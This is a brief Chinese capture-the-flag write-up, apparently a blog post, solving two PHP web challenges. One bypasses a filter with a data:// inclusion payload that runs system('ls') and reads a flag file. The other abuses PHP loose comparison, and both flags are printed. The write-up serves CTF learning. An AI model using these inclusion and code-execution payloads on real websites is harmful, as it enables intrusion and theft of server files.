目录
Web_php_include
1、题目
2、知识点
php伪协议
3、思路
审计源代码
需要我们上传一个page参数,但是对参数内容进行过滤,
$page=str_replace("php://", "", $page); 意思是将php://替换成空,
看到这个,联想到使用php伪协议,既然这个协议被过滤,那就用其他协议
使用data://协议,
data://text/plain,<?php phpinfo();?>
payload:
/?page=data://text/plain,<?php%20system("ls");?>
?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php");?>
右键查看源代码得到flag
flag:
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}
simple_php
4、题目
5、知识点
弱比较,数组绕过
6、思路
审计源代码,需要我们GET上传a,b两个变量,
if($a==0 and $a) 意思是a与0进行弱比较且不等于0,否则条件不成立
完整payload:?a="sss"&b=2222a
得到payload:Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}
这篇文章就先写到这里了,哪里不懂的或者哪里不足的欢迎指出
